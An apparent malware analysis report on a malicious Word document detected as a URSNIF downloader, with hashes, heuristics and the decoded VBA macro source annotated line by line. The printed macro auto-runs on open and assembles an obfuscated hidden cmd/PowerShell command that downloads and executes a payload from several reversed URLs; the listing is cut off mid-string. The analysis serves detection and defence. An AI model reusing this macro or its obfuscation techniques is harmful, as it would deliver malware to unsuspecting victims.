Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8d9d8a02cde1b17c…

MALICIOUS

Office (OLE)

78.6 KB Created: 2018-09-11 07:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 4caf8f1ba3c456ab5398053dca7d5132 SHA-1: 714cf6d58bff617565c959c4e02eed6ca50de3d0 SHA-256: 8d9d8a02cde1b17cd2e12f2d05965ec7a199be31d1eb3cade00f8e595a6b9ac0
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic); T1204.002 (Malicious File); T1566.001 (Spearphishing Attachment)

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates use of the Shell() function, most likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' further supports its nature as a downloader. The Document_Open macro is present, so the code runs automatically when the document is opened with macros enabled.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5965 bytes
SHA-256: beff985b561899a19a4c4cacbecd59c3cfad09dfcb58564d2cc9d442a41f7f41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kSLIGIsczOKY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as stored in the VBA project stream (decoded by olevba).
' VB_Base = "1Normal.ThisDocument" marks this as the ThisDocument class module
' of the Word document, i.e. the module whose Document_Open event auto-runs;
' VB_PredeclaredId = True gives the module a default instance, so the event
' handler below is reachable without any explicit instantiation.
' The random-looking VB_Name is consistent with generator-produced macros,
' though that is an inference, not something the stream itself proves.
' Auto-executing entry point: Word raises Document_Open when the document is
' opened (with macros enabled), so this Sub runs with no further user action.
' The OLE_VBA_DOCOPEN heuristic in the report above keys on exactly this.
' "On Error Resume Next" is written across four physical lines using the
' line-continuation character; the statement is unchanged, but the split
' defeats single-line string matches on the phrase — likely deliberate.
Private Sub Document_open()
On _
Error _
Resume _
Next
   ' VarType is called in statement form: its result is discarded, so these
   ' lines do nothing at run time. They appear to be filler interleaved with
   ' the real code (the same pattern recurs throughout both modules).
   VarType "GLnEwoBQ" + "FDd"
   VarType "7459" + "CS"
   VarType "9396" + "ljKtaTs"
' The only effective statement. Shell receives a single command string built
' from three helper functions (qihRl and dKwfailFO are defined in the second
' module below; iOFAC is outside this excerpt), so the full command exists
' only at run time — static string scans of the document see only fragments.
' vbHide as the WindowStyle argument starts the process with no visible
' window. This is the OLE_VBA_SHELL finding; what the launched command does
' is documented on the helpers, not here.
Shell qihRl + dKwfailFO + iOFAC, Format(vbHide)
   VarType "nXCzk" + "bkE" + "8768" + "h"
   VarType "O" + "PXuTkj"
   VarType "vMqv" + "NlFY"
End Sub



Attribute VB_Name = "XiAiSwmSNXGLav"
' Second module: holds the helper functions (qihRl, dKwfailFO, ...) that
' assemble the command string handed to Shell in Document_open. No VB_Base
' attribute is present here, so this appears to be a standard (non-class)
' module rather than a document class module.
' Builds the first part of the Shell command line. Everything is assembled
' from short string literals and Chr() arithmetic so that no recognisable
' keyword appears intact in the stored macro stream. Returns the six
' fragments below joined in order (the assignment to qihRl near the end);
' the VarType lines between them are discarded-result filler.
Function qihRl()

On _
Error _
Resume _
Next
VarType "SQsTMXVI" + "FJViTaWKUA"
' Chr(4+3+7+9+76) = Chr(99) = "c"; Chr(3+2+4+6+52) = Chr(67) = "C";
' Chr(1+1+2+2+28) = Chr(34) = a double quote. This fragment therefore opens
' with cmd /V/C" followed by a caret-laced "set" statement: a cmd.exe launch
' with delayed variable expansion (/V). cmd treats ^ as an escape character
' and drops it, so the runs of carets and spaces are no-ops whose only
' purpose is to break signature matches on the command text. Caret-dense
' command lines and cmd /V are themselves useful hunting/detection signals.
wToqUwXF = Format(Chr(4 + 3 + 7 + 9 + 76)) + "md /V/" + Format(Chr(3 + 2 + 4 + 6 + 52)) + Format(Chr(1 + 1 + 2 + 2 + 28)) + "s^" + "e^t" + " 9" + "^E" + "^F=" + " ^" + "  ^ ^ " + "    ^ ^" + " ^ ^ ^ " + "  ^" + " }}^"
VarType "1931" + "htsPqjrl" + "Kl" + "pu"
   VarType "ita" + "3846" + "TIK" + "r"
   VarType "PZTiLqOLQW" + "1201"
   VarType "225042615" + "215436024"
   VarType "hXBEIWVBYv" + "dttpJS" + "tswzLwd" + "390060590"
' The remaining fragments carry more caret-obfuscated text. Several read as
' reversed words (e.g. "metI" is "Item" backwards), so the batch stage
' presumably reorders or reverses the string before executing it. Not decoded
' here; confirm against the process tree / command lines in dynamic analysis.
vVGffBq = "{h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^" + "ta" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^}" + "^;k^a^e" + "rb;^w^H" + "Y^$^ ^" + "metI"
VarType "ANDEDtAdt" + "147501874" + "IDwFJhJGM" + "jEVidz"
   VarType "joIjfrt" + "H" + "zjREwi" + "1255"
   VarType "w" + "376284110" + "jl" + "zslzmjhME"
   VarType "7104" + "UtoF" + "MEOV" + "392641116"
CpvkvSbirwm = "-" + "^" + "e" + "k" + "^ovn^I" + "^;)^wHY" + "$^ ^,^z" + "^Fp^" + "$(eli" + "F^da" + "o^"
VarType "zJD" + "4952"
   VarType "7633" + "2910" + "t" + "4245"
   VarType "fCw" + "tDjtWjvrSLSvrY"
FzQlWFja = "lnw^" + "o^D^.M" + "^z" + "V^${^" + "yr^t" + "{)^b" + "^Pv^$^" + " n" + "^i z" + "F" + "^p$"
VarType "BMQdrrZ" + "jq"
   VarType "v" + "h" + "zwiG" + "lZTGokw"
   VarType "bXNVUMopSnBln" + "39566145"
   VarType "huJW" + "AfVr" + "wmps" + "432950653"
VcBmj = "(^h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "a^e" + "r^o" + "f;^" + "'^e"
VarType "ImvjYNN" + "kbS" + "9215" + "FT"
iwdsGZiwWP = "^xe^.'" + "+^f" + "v" + "^f$+'^" + "\^" + "'+" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "i" + "l" + "^bu"
' Return value: the six fragments concatenated in the order built above.
' The filler after this line never affects the result.
qihRl = wToqUwXF + vVGffBq + CpvkvSbirwm + FzQlWFja + VcBmj + iwdsGZiwWP
   VarType "uhrV" + "aYOCBBHji"
   VarType "266007100" + "522221226"
   VarType "E" + "341595841" + "frU" + "a"
End Function
Function dKwfailFO()

On _
Error _
Resume _
Next
VarType "wJmYVHh" + "uPPL"
   VarType "RV" + "58595992"
ddapZwIfbt = "p" + ":vn^e$" + "^" + "=^wH" + "Y$;" + "'^8" + "^84^'"
VarType "223830230" + "103014036" + "485438920" + "Ew"
   VarType "BmYR" + "iHE" + "257315928" + "fpa"
EKMsIMKU = "^ = fv" + "^f^$^" + ";)^'" + "@'(^" + "ti" + "l^" + "p^S.'^B" + "^" + "w^" + "e" + "^oLZ3^" + "x/" + "^tp"
VarType "E" + "389342528" + "XwMEjjGFO" + "XLQ"
   VarType "20465688" + "363997024" + "1087" + "fAwiwq"
   VarType "3924" + "llzp" + "343673353" + "N"
   VarType "TUCqNa" + "Mo" + "493653995" + "32912953"
wbDzNzCR = ".^sg^o" + "^du^a^" + "im//^" + ":ptth^" + "@1A^" + "6^09R" + "^" + "1/" + "^mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^.s^e^" + "l"
VarType "5131" + "rtiGT"
cwoXZGC = "a" + "st^a^" + "o^b^en^" + "i^lr^" + "ev^l^i" + "s//^" + ":^p" + "t^t^h@"
VarType "tjzM" + "106513604" + "119746850" + "uD"
   VarType "9619" + "f" + "iKvV" + "j"
   VarType "wGZzYZUts" + "250332771"
   VarType "3440" + "wXpl"
Cwibs = "^F" + "/a^" + "u^.mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + ".t^s" + "^"
VarType "290631908" + "vJtQ"
   VarType "HZmFOkIM" + "ElG"
   VarType "4554" + "3969"
RSpjBtzsKSi = "on^g^a^" + "i" + "d" + "-otu^a/" + "/^:" + "p^tth^@" + "r^bty" + "J^d^"
VarType "zvqSTVJc" + "7338" + "uArnwhwztbnG" + "uYEHb"
   VarType "507436645" + "UwQzni"
   VarType "9426" + "58389559"
   VarType "mMmwCzjj" + "wulSpQ"
lphNEl = "Y/" + "l^p^." + "^s^s" + "^e" + "^" + "y//" + "^" + ":^ptt" + "^h" + "@n^" + "w^" + "K0nW/^m"
VarType "8093" + "304564285" + "1137" + "4760"
   VarType "lDz" + "fmU" + "6254" + "RnaHmjpKwEVpX"
mfXucZW = "
... (truncated)